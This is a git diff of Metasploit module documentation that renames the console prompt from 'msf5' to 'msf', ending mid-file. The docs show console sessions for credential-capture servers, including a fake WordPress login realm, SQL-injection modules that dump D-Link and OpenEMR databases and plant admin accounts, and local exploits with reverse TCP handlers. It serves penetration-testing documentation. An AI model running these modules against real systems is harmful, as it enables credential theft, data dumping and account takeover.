auxiliary/scanner/tftp/tftpbrute -msf5 auxiliary(scanner/tftp/tftpbrute) > set rhosts 1.1.1.1 +msf > use auxiliary/scanner/tftp/tftpbrute +msf auxiliary(scanner/tftp/tftpbrute) > set rhosts 1.1.1.1 rhosts => 1.1.1.1 -msf5 auxiliary(scanner/tftp/tftpbrute) > set verbose true +msf auxiliary(scanner/tftp/tftpbrute) > set verbose true verbose => true -msf5 auxiliary(scanner/tftp/tftpbrute) > run +msf auxiliary(scanner/tftp/tftpbrute) > run [+] Found test.txt on 1.1.1.1 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/tftp/tftpbrute) > +msf auxiliary(scanner/tftp/tftpbrute) > ``` diff --git a/documentation/modules/auxiliary/scanner/ubiquiti/ubiquiti_discover.md b/documentation/modules/auxiliary/scanner/ubiquiti/ubiquiti_discover.md index 901b50cdc7..e37fc756ea 100644 --- a/documentation/modules/auxiliary/scanner/ubiquiti/ubiquiti_discover.md +++ b/documentation/modules/auxiliary/scanner/ubiquiti/ubiquiti_discover.md @@ -16,6 +16,6 @@ Many devices produced by Ubiquiti are affected by this issue. ``` - msf5 auxiliary(scanner/ubiquiti/ubiquiti_discover) > run + msf auxiliary(scanner/ubiquiti/ubiquiti_discover) > run [+] 192.168.1.1:10001 Ubiquiti Discovery metadata: {"ips"=>["192.168.0.1", "192.168.1.1"], "macs"=>["80:2a:a8:df:aa:bb", "f8:1e:df:f8:aa:bb"], "name"=>"ubnt", "model_short"=>"ER-X", "firmware"=>"EdgeRouter.ER-e50.v1.9.7+hotfix.4.5024279.171006.0255"} ``` diff --git a/documentation/modules/auxiliary/scanner/vxworks/urgent11_check.md b/documentation/modules/auxiliary/scanner/vxworks/urgent11_check.md index fd454c1a3e..73132f2635 100644 --- a/documentation/modules/auxiliary/scanner/vxworks/urgent11_check.md +++ b/documentation/modules/auxiliary/scanner/vxworks/urgent11_check.md @@ -19,13 +19,13 @@ ## Scenarios ``` -msf5 auxiliary(scanner/vxworks/urgent11_check) > set RHOSTS 192.168.86.1 192.168.86.2 +msf auxiliary(scanner/vxworks/urgent11_check) > set RHOSTS 192.168.86.1 192.168.86.2 RHOSTS => 192.168.86.1 192.168.86.2 -msf5 auxiliary(scanner/vxworks/urgent11_check) > set THREADS 2 +msf auxiliary(scanner/vxworks/urgent11_check) > set THREADS 2 THREADS => 2 -msf5 auxiliary(scanner/vxworks/urgent11_check) > set RPORTS 21 22 23 80 443 +msf auxiliary(scanner/vxworks/urgent11_check) > set RPORTS 21 22 23 80 443 RPORTS => 21 22 23 80 443 -msf5 auxiliary(scanner/vxworks/urgent11_check) > run +msf auxiliary(scanner/vxworks/urgent11_check) > run [*] 192.168.86.1:21 being checked [*] 192.168.86.2:21 being checked @@ -42,5 +42,5 @@ msf5 auxiliary(scanner/vxworks/urgent11_check) > run [+] 192.168.86.2:443 affected by CVE-2019-12258 [*] Scanned 2 of 2 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/vxworks/urgent11_check) > +msf auxiliary(scanner/vxworks/urgent11_check) > ``` diff --git a/documentation/modules/auxiliary/server/capture/ftp.md b/documentation/modules/auxiliary/server/capture/ftp.md index 901110dfc2..85d10287e3 100644 --- a/documentation/modules/auxiliary/server/capture/ftp.md +++ b/documentation/modules/auxiliary/server/capture/ftp.md @@ -36,12 +36,12 @@ This module creates a mock FTP server which accepts credentials before throwing Server: ``` -msf5 > use auxiliary/server/capture/ftp -msf5 auxiliary(server/capture/ftp) > set banner "Microsoft FTP Service" +msf > use auxiliary/server/capture/ftp +msf auxiliary(server/capture/ftp) > set banner "Microsoft FTP Service" banner => Microsoft FTP Service -msf5 auxiliary(server/capture/ftp) > run +msf auxiliary(server/capture/ftp) > run [*] Auxiliary module running as background job 0. -msf5 auxiliary(server/capture/ftp) > +msf auxiliary(server/capture/ftp) > [*] Started service listener on 0.0.0.0:21 [*] Server started. [+] FTP LOGIN 127.0.0.1:44526 root / SuperSecret9 @@ -66,7 +66,7 @@ PASS SuperSecret9 Server: ``` -msf5 > openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem +msf > openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem [*] exec: openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem Generating a RSA private key @@ -88,10 +88,10 @@ Organization Name (eg, company) [Internet Widgits Pty Ltd]: Organizational Unit Name (eg, section) []: Common Name (e.g. server FQDN or YOUR name) []: Email Address []: -msf5 > cat key.pem certificate.pem > selfsigned.pem +msf > cat key.pem certificate.pem > selfsigned.pem [*] exec: cat key.pem certificate.pem > selfsigned.pem -msf5 > cat /root/metasploit-framework/selfsigned.pem +msf > cat /root/metasploit-framework/selfsigned.pem [*] exec: cat /root/metasploit-framework/selfsigned.pem -----BEGIN PRIVATE KEY----- @@ -144,16 +144,16 @@ n9UgZH3Kq/ptE3Jw6gdj11XT1RSn5NgCutxeCEuPzUhwg3XmVL5fOASJbohQxdGb mVuIIRbrDW/sOgu2Viis -----END CERTIFICATE----- -msf5 > use auxiliary/server/capture/ftp -msf5 auxiliary(server/capture/ftp) > set srvport 990 +msf > use auxiliary/server/capture/ftp +msf auxiliary(server/capture/ftp) > set srvport 990 srvport => 990 -msf5 auxiliary(server/capture/ftp) > set ssl true +msf auxiliary(server/capture/ftp) > set ssl true ssl => true -msf5 auxiliary(server/capture/ftp) > set sslcert /root/metasploit-framework/selfsigned.pem +msf auxiliary(server/capture/ftp) > set sslcert /root/metasploit-framework/selfsigned.pem sslcert => /root/metasploit-framework/selfsigned.pem -msf5 auxiliary(server/capture/ftp) > run +msf auxiliary(server/capture/ftp) > run [*] Auxiliary module running as background job 0. -msf5 auxiliary(server/capture/ftp) > +msf auxiliary(server/capture/ftp) > [*] Started service listener on 0.0.0.0:990 [*] Server started. [+] FTP LOGIN 127.0.0.1:33618 admin / password123 diff --git a/documentation/modules/auxiliary/server/capture/http_basic.md b/documentation/modules/auxiliary/server/capture/http_basic.md index 50990bd9f4..819b9ccb8e 100644 --- a/documentation/modules/auxiliary/server/capture/http_basic.md +++ b/documentation/modules/auxiliary/server/capture/http_basic.md @@ -45,14 +45,14 @@ This module creates a mock web server which, utilizing a HTTP 401 response, prom Server: ``` -msf5 > use auxiliary/server/capture/http_basic -msf5 auxiliary(server/capture/http_basic) > set REALM "level_15 or view_access" +msf > use auxiliary/server/capture/http_basic +msf auxiliary(server/capture/http_basic) > set REALM "level_15 or view_access" REALM => level_15 or view_access -msf5 auxiliary(server/capture/http_basic) > set uripath '/cisco' +msf auxiliary(server/capture/http_basic) > set uripath '/cisco' uripath => /cisco -msf5 auxiliary(server/capture/http_basic) > run +msf auxiliary(server/capture/http_basic) > run [*] Auxiliary module running as background job 0. -msf5 auxiliary(server/capture/http_basic) > +msf auxiliary(server/capture/http_basic) > [*] Using URL: http://0.0.0.0:80/cisco [*] Local IP: http://10.1.1.1:80/cisco [*] Server started. @@ -78,7 +78,7 @@ HTTP request sent, awaiting response... 404 Not Found Server: ``` -msf5 > openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem +msf > openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem [*] exec: openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem Generating a RSA private key @@ -100,10 +100,10 @@ Organization Name (eg, company) [Internet Widgits Pty Ltd]: Organizational Unit Name (eg, section) []: Common Name (e.g. server FQDN or YOUR name) []: Email Address []: -msf5 > cat key.pem certificate.pem > selfsigned.pem +msf > cat key.pem certificate.pem > selfsigned.pem [*] exec: cat key.pem certificate.pem > selfsigned.pem -msf5 > cat /root/metasploit-framework/selfsigned.pem +msf > cat /root/metasploit-framework/selfsigned.pem [*] exec: cat /root/metasploit-framework/selfsigned.pem -----BEGIN PRIVATE KEY----- @@ -155,16 +155,16 @@ NDO8po38u2ba52E56abfg0ZlFBqsua2s1TPHIyQ9iovTPMg1E5UTTGebaN6/BaMh Oj6N43ld9EONST6BhP3v1buoWHi1FMouocrUkUDuahiHoLlK4ERSUrb4uNnwko24 WdNCCmA8APA1qf2BYVqs -----END CERTIFICATE----- -msf5 > use auxiliary/server/capture/http_basic -msf5 auxiliary(server/capture/http_basic) > set ssl true +msf > use auxiliary/server/capture/http_basic +msf auxiliary(server/capture/http_basic) > set ssl true ssl => true -msf5 auxiliary(server/capture/http_basic) > set srvport 443 +msf auxiliary(server/capture/http_basic) > set srvport 443 srvport => 443 -msf5 auxiliary(server/capture/http_basic) > set sslcert /root/metasploit-framework/selfsigned.pem +msf auxiliary(server/capture/http_basic) > set sslcert /root/metasploit-framework/selfsigned.pem sslcert => /root/metasploit-framework/selfsigned.pem -msf5 auxiliary(server/capture/http_basic) > run +msf auxiliary(server/capture/http_basic) > run [*] Auxiliary module running as background job 0. -msf5 auxiliary(server/capture/http_basic) > +msf auxiliary(server/capture/http_basic) > [*] Using URL: https://0.0.0.0:443/4w0tML [*] Local IP: https://192.168.2.117:443/4w0tML [*] Server started. @@ -203,14 +203,14 @@ HTML Payload Injected: Server: ``` -msf5 > use auxiliary/server/capture/http_basic -msf5 auxiliary(server/capture/http_basic) > set uripath '/' +msf > use auxiliary/server/capture/http_basic +msf auxiliary(server/capture/http_basic) > set uripath '/' uripath => / -msf5 auxiliary(server/capture/http_basic) > set REALM "Wordpress.com Login" +msf auxiliary(server/capture/http_basic) > set REALM "Wordpress.com Login" REALM => Wordpress.com Login -msf5 auxiliary(server/capture/http_basic) > run +msf auxiliary(server/capture/http_basic) > run [*] Auxiliary module running as background job 0. -msf5 auxiliary(server/capture/http_basic) > +msf auxiliary(server/capture/http_basic) > [*] Using URL: http://0.0.0.0:80/ [*] Local IP: http://192.168.2.117:80/ [*] Server started. @@ -244,14 +244,14 @@ document.write('<iframe width="0" height="0" src="http://' + username + ':' + Sever: ``` -msf5 > use auxiliary/server/capture/http_basic -msf5 auxiliary(server/capture/http_basic) > set uripath '/' +msf > use auxiliary/server/capture/http_basic +msf auxiliary(server/capture/http_basic) > set uripath '/' uripath => / -msf5 auxiliary(server/capture/http_basic) > set REALM "Login" +msf auxiliary(server/capture/http_basic) > set REALM "Login" REALM => Login -msf5 auxiliary(server/capture/http_basic) > run +msf auxiliary(server/capture/http_basic) > run [*] Auxiliary module running as background job 0. -msf5 auxiliary(server/capture/http_basic) > +msf auxiliary(server/capture/http_basic) > [*] Using URL: http://0.0.0.0:80/ [*] Local IP: http://192.168.2.117:80/ [*] Server started. @@ -262,7 +262,7 @@ msf5 auxiliary(server/capture/http_basic) > Decoding the cookie: ``` -msf5 auxiliary(server/capture/http_basic) > irb +msf auxiliary(server/capture/http_basic) > irb [*] Starting IRB shell... [*] You are in auxiliary/server/capture/http_basic diff --git a/documentation/modules/auxiliary/server/capture/imap.md b/documentation/modules/auxiliary/server/capture/imap.md index f4aeb5483d..4c3f7c31c1 100644 --- a/documentation/modules/auxiliary/server/capture/imap.md +++ b/documentation/modules/auxiliary/server/capture/imap.md @@ -37,12 +37,12 @@ This module creates a mock IMAP server which accepts credentials. Server: ``` -msf5 > use auxiliary/server/capture/imap -msf5 auxiliary(server/capture/imap) > set banner "The Microsoft Exchange IMAP4 service is ready." +msf > use auxiliary/server/capture/imap +msf auxiliary(server/capture/imap) > set banner "The Microsoft Exchange IMAP4 service is ready." banner => The Microsoft Exchange IMAP4 service is ready. -msf5 auxiliary(server/capture/imap) > run +msf auxiliary(server/capture/imap) > run [*] Auxiliary module running as background job 0. -msf5 auxiliary(server/capture/imap) > +msf auxiliary(server/capture/imap) > [*] Started service listener on 0.0.0.0:143 [*] Server started. [*] IMAP LOGIN 127.0.0.1:42972 metasploit@documentation.com / rapid7#1 @@ -66,7 +66,7 @@ Connection closed by foreign host. Server: ``` -msf5 > openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem +msf > openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem [*] exec: openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem Generating a RSA private key @@ -88,10 +88,10 @@ Organization Name (eg, company) [Internet Widgits Pty Ltd]: Organizational Unit Name (eg, section) []: Common Name (e.g. server FQDN or YOUR name) []: Email Address []: -msf5 > cat key.pem certificate.pem > selfsigned.pem +msf > cat key.pem certificate.pem > selfsigned.pem [*] exec: cat key.pem certificate.pem > selfsigned.pem -msf5 > cat /root/metasploit-framework/selfsigned.pem +msf > cat /root/metasploit-framework/selfsigned.pem [*] exec: cat /root/metasploit-framework/selfsigned.pem -----BEGIN PRIVATE KEY----- @@ -143,16 +143,16 @@ gF+lHk+pX8GM0WvI7ypgrK956YCdmh3DULBFDu5RxVABFWrGedfNy6TKLTps0PXR l/m7Kka0n7lXnKo+IFSJ0dTooBvwaV7+4tEGuHxWJsNO+2aex9qFCuDUdBFxyWyK uBVlsY6F7EjTfWpxwyVP -----END CERTIFICATE----- -msf5 > use auxiliary/server/capture/imap -msf5 auxiliary(server/capture/imap) > set ssl true +msf > use auxiliary/server/capture/imap +msf auxiliary(server/capture/imap) > set ssl true ssl => true -msf5 auxiliary(server/capture/imap) > set sslcert /root/metasploit-framework/selfsigned.pem +msf auxiliary(server/capture/imap) > set sslcert /root/metasploit-framework/selfsigned.pem sslcert => /root/metasploit-framework/selfsigned.pem -msf5 auxiliary(server/capture/imap) > set srvport 993 +msf auxiliary(server/capture/imap) > set srvport 993 srvport => 993 -msf5 auxiliary(server/capture/imap) > run +msf auxiliary(server/capture/imap) > run [*] Auxiliary module running as background job 0. -msf5 auxiliary(server/capture/imap) > +msf auxiliary(server/capture/imap) > [*] Started service listener on 0.0.0.0:993 [*] Server started. [+] IMAP LOGIN 127.0.0.1:59024 "johndoe" / "p455w0rd" diff --git a/documentation/modules/auxiliary/server/capture/mysql.md b/documentation/modules/auxiliary/server/capture/mysql.md index 2ccf3e942f..698cedbc6b 100644 --- a/documentation/modules/auxiliary/server/capture/mysql.md +++ b/documentation/modules/auxiliary/server/capture/mysql.md @@ -40,12 +40,12 @@ This module creates a mock MySQL server which accepts credentials. Upon receivi Server: ``` -msf5 > use auxiliary/server/capture/mysql -msf5 auxiliary(server/capture/mysql) > set johnpwfile /tmp/mysql.logins +msf > use auxiliary/server/capture/mysql +msf auxiliary(server/capture/mysql) > set johnpwfile /tmp/mysql.logins johnpwfile => /tmp/mysql.logins -msf5 auxiliary(server/capture/mysql) > run +msf auxiliary(server/capture/mysql) > run [*] Auxiliary module running as background job 0. -msf5 auxiliary(server/capture/mysql) > +msf auxiliary(server/capture/mysql) > [*] Started service listener on 0.0.0.0:3306 [*] Server started. [+] 127.0.0.1:59604 - User: admin; Challenge: 112233445566778899aabbccddeeff1122334455; Response: 46677c2d9cac93da328c4321060c125db759925e diff --git a/documentation/modules/auxiliary/server/capture/postgresql.md b/documentation/modules/auxiliary/server/capture/postgresql.md index 17537e62eb..7b006ee5c9 100644 --- a/documentation/modules/auxiliary/server/capture/postgresql.md +++ b/documentation/modules/auxiliary/server/capture/postgresql.md @@ -25,8 +25,8 @@ This module creates a mock PostgreSQL server which accepts credentials. Upon re Server: ``` -msf5 > use auxiliary/server/capture/postgresql -msf5 auxiliary(server/capture/postgresql) > run +msf > use auxiliary/server/capture/postgresql +msf auxiliary(server/capture/postgresql) > run [*] Auxiliary module running as background job 0. [*] Started service listener on 0.0.0.0:5432 diff --git a/documentation/modules/auxiliary/server/capture/printjob_capture.md b/documentation/modules/auxiliary/server/capture/printjob_capture.md index 78623d6449..bbf61b00cc 100644 --- a/documentation/modules/auxiliary/server/capture/printjob_capture.md +++ b/documentation/modules/auxiliary/server/capture/printjob_capture.md @@ -37,20 +37,20 @@ This module creates a mock print server which accepts print jobs. Server: ``` -msf5 > use auxiliary/server/capture/printjob_capture -msf5 auxiliary(server/capture/printjob_capture) > run +msf > use auxiliary/server/capture/printjob_capture +msf auxiliary(server/capture/printjob_capture) > run [*] Auxiliary module running as background job 0. [*] Starting Print Server on 0.0.0.0:9100 - RAW mode [*] Started service listener on 0.0.0.0:9100 [*] Server started. -msf5 auxiliary(server/capture/printjob_capture) > [*] Printjob Capture Service: Client connection from 127.0.0.1:44678 +msf auxiliary(server/capture/printjob_capture) > [*] Printjob Capture Service: Client connection from 127.0.0.1:44678 [*] Printjob Capture Service: Client 127.0.0.1:44678 closed connection after 249 bytes of data [-] Unable to detect printjob type, dumping complete output [+] Incoming printjob - Unnamed saved to loot [+] Loot filename: /root/.msf4/loot/20181117205902_default_127.0.0.1_prn_snarf.unknow_003464.bin -msf5 auxiliary(server/capture/printjob_capture) > cat /root/.msf4/loot/20181117205902_default_127.0.0.1_prn_snarf.unknow_003464.bin +msf auxiliary(server/capture/printjob_capture) > cat /root/.msf4/loot/20181117205902_default_127.0.0.1_prn_snarf.unknow_003464.bin [*] exec: cat /root/.msf4/loot/20181117205902_default_127.0.0.1_prn_snarf.unknow_003464.bin PRETTY_NAME="Kali GNU/Linux Rolling" diff --git a/documentation/modules/auxiliary/server/capture/smtp.md b/documentation/modules/auxiliary/server/capture/smtp.md index 2a606bd043..bba2de7455 100644 --- a/documentation/modules/auxiliary/server/capture/smtp.md +++ b/documentation/modules/auxiliary/server/capture/smtp.md @@ -155,7 +155,7 @@ Testing: RSET during middle of DATA RSET [*] SMTP: 127.0.0.1:46222 EMAIL: testing a message which gets cancelled Response: 250 OK -msf5 auxiliary(server/capture/smtp) > creds +msf auxiliary(server/capture/smtp) > creds Credentials =========== @@ -165,7 +165,7 @@ host origin service public private 127.0.0.1 127.0.0.1 25/tcp (smtp) username_login password_login Password 127.0.0.1 127.0.0.1 25/tcp (smtp) username_plain password_plain Password -msf5 auxiliary(server/capture/smtp) > notes +msf auxiliary(server/capture/smtp) > notes Notes ===== diff --git a/documentation/modules/auxiliary/server/capture/telnet.md b/documentation/modules/auxiliary/server/capture/telnet.md index ef4836b7f8..a0cdf5e448 100644 --- a/documentation/modules/auxiliary/server/capture/telnet.md +++ b/documentation/modules/auxiliary/server/capture/telnet.md @@ -28,10 +28,10 @@ This module creates a mock telnet server which accepts credentials. Upon receiv Server: ``` -msf5 > use auxiliary/server/capture/telnet -msf5 auxiliary(server/capture/telnet) > run +msf > use auxiliary/server/capture/telnet +msf auxiliary(server/capture/telnet) > run [*] Auxiliary module running as background job 0. -msf5 auxiliary(server/capture/telnet) > +msf auxiliary(server/capture/telnet) > [*] Started service listener on 0.0.0.0:23 [*] Server started. [+] TELNET LOGIN 127.0.0.1:40016 root / <3@wvu_is_my_hero diff --git a/documentation/modules/auxiliary/server/capture/vnc.md b/documentation/modules/auxiliary/server/capture/vnc.md index 7f74ef4eb8..4f5a7bbb63 100644 --- a/documentation/modules/auxiliary/server/capture/vnc.md +++ b/documentation/modules/auxiliary/server/capture/vnc.md @@ -32,17 +32,17 @@ This module creates a mock VNC server which accepts credentials. Upon receiving Server, Client: ``` -msf5 > use auxiliary/server/capture/vnc -msf5 auxiliary(server/capture/vnc) > use auxiliary/server/capture/vnc -msf5 auxiliary(server/capture/vnc) > set johnpwfile /tmp/john +msf > use auxiliary/server/capture/vnc +msf auxiliary(server/capture/vnc) > use auxiliary/server/capture/vnc +msf auxiliary(server/capture/vnc) > set johnpwfile /tmp/john johnpwfile => /tmp/john -msf5 auxiliary(server/capture/vnc) > run +msf auxiliary(server/capture/vnc) > run [*] Auxiliary module running as background job 0. -msf5 auxiliary(server/capture/vnc) > +msf auxiliary(server/capture/vnc) > [*] Started service listener on 0.0.0.0:5900 [*] Server started. -msf5 auxiliary(server/capture/vnc) > vncviewer 127.0.0.1 +msf auxiliary(server/capture/vnc) > vncviewer 127.0.0.1 [*] exec: vncviewer 127.0.0.1 Connected to RFB server, using protocol version 3.7 @@ -56,7 +56,7 @@ Authentication failure John the Ripper (JTR) Cracker: ``` -msf5 auxiliary(server/capture/vnc) > john /tmp/john_vnc +msf auxiliary(server/capture/vnc) > john /tmp/john_vnc [*] exec: john /tmp/john_vnc Using default input encoding: UTF-8 diff --git a/documentation/modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.md b/documentation/modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.md index c8056be03f..cd688af0eb 100644 --- a/documentation/modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.md +++ b/documentation/modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.md @@ -35,7 +35,7 @@ Has been tested with 1.03r098. ## Actions ``` -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > show actions +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > show actions Auxiliary actions: @@ -50,7 +50,7 @@ Auxiliary actions: ## Options ``` -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > show options +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > show options Module options (auxiliary/sqli/dlink/dlink_central_wifimanager_sqli): @@ -74,15 +74,15 @@ This module has both `check` and `run` functions. ### Retrieving all the data from the database ``` -msf5 > use auxiliary/sqli/dlink/dlink_central_wifimanager_sqli -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set action SQLI_DUMP +msf > use auxiliary/sqli/dlink/dlink_central_wifimanager_sqli +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set action SQLI_DUMP action => SQLI_DUMP -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set rhosts 192.168.1.223 +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set rhosts 192.168.1.223 rhosts => 192.168.1.223 -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > check +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > check [+] 192.168.1.223:443 - The target is vulnerable. -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run [*] Running module against 192.168.1.223 [+] Target seems vulnerable @@ -103,8 +103,8 @@ msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run [+] devicesnmpsecuritytable saved to /home/redouane/.msf4/loot/20200828180154_default_192.168.1.223_dlink.http_825556.csv [*] Auxiliary module execution completed -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > creds +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > creds Credentials =========== @@ -113,8 +113,8 @@ host origin service public private realm 192.168.1.223 admin 21232f297a57a5a743894a0e4a801fc3 Nonreplayable hash raw-md5 192.168.1.223 red0xff f0e166dc34d14d6c228ffac576c9a43c Nonreplayable hash raw-md5 -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > loot +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > loot Loot ==== @@ -129,44 +129,44 @@ host service type name content ult_192.168.1.223_dlink.http_878195.csv 192.168.1.223 dlink.http devicesnmpsecuritytable.csv application/csv /home/redouane/.msf4/loot/20200828180506_default_192.168.1.223_dlink.http_086271.csv -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > ``` ### Adding an admin user/changing the password of a user ``` -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set action ADD_ADMIN +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set action ADD_ADMIN action => ADD_ADMIN -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Username msfadmin +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Username msfadmin Admin_Username => msfadmin -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Password msfadmin +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Password msfadmin Admin_Password => msfadmin -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run [*] Running module against 192.168.1.223 [+] Target seems vulnerable [*] User not found on the target, inserting [*] Auxiliary module execution completed -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Password msfpassword +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Password msfpassword Admin_Password => msfpassword -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run [*] Running module against 192.168.1.223 [*] Trying to detect installed version [+] Target seems vulnerable [*] User already exists, updating the password [*] Auxiliary module execution completed -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > ``` ### Deleting an administrator user ``` -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set action REMOVE_ADMIN +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set action REMOVE_ADMIN action => REMOVE_USER -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Username red0xff +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Username red0xff Admin_Username => red0xff -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run [*] Running module against 192.168.1.223 [+] Target seems vulnerable diff --git a/documentation/modules/auxiliary/sqli/openemr/openemr_sqli_dump.md b/documentation/modules/auxiliary/sqli/openemr/openemr_sqli_dump.md index aad2adffc6..29cd5cfa1d 100644 --- a/documentation/modules/auxiliary/sqli/openemr/openemr_sqli_dump.md +++ b/documentation/modules/auxiliary/sqli/openemr/openemr_sqli_dump.md @@ -13,7 +13,7 @@ OpenEMR 5.0.1 (3). ## Options ``` -msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > show options +msf auxiliary(sqli/openemr/openemr_sqli_dump) > show options Module options (auxiliary/sqli/openemr/openemr_sqli_dump): @@ -32,14 +32,14 @@ Module options (auxiliary/sqli/openemr/openemr_sqli_dump): This module has both `check` and `run` functions. ``` -msf5 > use auxiliary/sqli/openemr/openemr_sqli_dump -msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > set rhosts 127.0.0.1 +msf > use auxiliary/sqli/openemr/openemr_sqli_dump +msf auxiliary(sqli/openemr/openemr_sqli_dump) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > check +msf auxiliary(sqli/openemr/openemr_sqli_dump) > check [*] Trying to detect installed version [*] 127.0.0.1:80 - The target appears to be vulnerable. -msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > run +msf auxiliary(sqli/openemr/openemr_sqli_dump) > run [*] Running module against 127.0.0.1 [*] DB Version: 10.3.15-MariaDB-1 @@ -61,7 +61,7 @@ msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > run [*] Dumping table (310/310): geo_country_reference [*] Dumped all tables to /root/.msf4/loot [*] Auxiliary module execution completed -msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > exit +msf auxiliary(sqli/openemr/openemr_sqli_dump) > exit root@localhost:/# cd /root/.msf4/loot root@localhost:~/.msf4/loot# ls -l diff --git a/documentation/modules/exploit/aix/local/xorg_x11_server.md b/documentation/modules/exploit/aix/local/xorg_x11_server.md index cead3a34a9..a3cc00fc1e 100644 --- a/documentation/modules/exploit/aix/local/xorg_x11_server.md +++ b/documentation/modules/exploit/aix/local/xorg_x11_server.md @@ -46,11 +46,11 @@ A writable directory file system path. (default: `/tmp`) https://vimeo.com/372193921 ``` -msf5 exploit(aix/local/xorg_x11_server) > set session 1 +msf exploit(aix/local/xorg_x11_server) > set session 1 session => 1 -msf5 exploit(aix/local/xorg_x11_server) > set writabledir /tmp +msf exploit(aix/local/xorg_x11_server) > set writabledir /tmp writabledir => /tmp -msf5 exploit(aix/local/xorg_x11_server) > run +msf exploit(aix/local/xorg_x11_server) > run [*] Started reverse TCP handler on 0.0.0.0:8888 [*] Xorg version is 7.2.3.0 diff --git a/documentation/modules/exploit/android/local/binder_uaf.md b/documentation/modules/exploit/android/local/binder_uaf.md index d767f32ebc..bd787fd826 100644 --- a/documentation/modules/exploit/android/local/binder_uaf.md +++ b/documentation/modules/exploit/android/local/binder_uaf.md @@ -24,13 +24,13 @@ Linux localhost 4.4.177-g83bee1dc48e8 #1 SMP PREEMPT Mon Jul 22 20:12:03 UTC 201 - Run the exploit: ``` -msf5 exploit(multi/handler) > use exploit/android/local/binder_uaf -msf5 exploit(android/local/binder_uaf) > set LHOST IPADDR -msf5 exploit(android/local/binder_uaf) > set LPORT 4448 (different from your Android meterpreter port) +msf exploit(multi/handler) > use exploit/android/local/binder_uaf +msf exploit(android/local/binder_uaf) > set LHOST IPADDR +msf exploit(android/local/binder_uaf) > set LPORT 4448 (different from your Android meterpreter port) LPORT => 4448 -msf5 exploit(android/local/binder_uaf) > set SESSION -1 +msf exploit(android/local/binder_uaf) > set SESSION -1 SESSION => -1 -msf5 exploit(android/local/binder_uaf) > run +msf exploit(android/local/binder_uaf) > run ``` - **Verify** the new session can read and write private application data (in /data/data/..../) diff --git a/documentation/modules/exploit/android/local/futex_requeue.md b/documentation/modules/exploit/android/local/futex_requeue.md index ee2f666b94..6a01a7d2f1 100644 --- a/documentation/modules/exploit/android/local/futex_requeue.md +++ 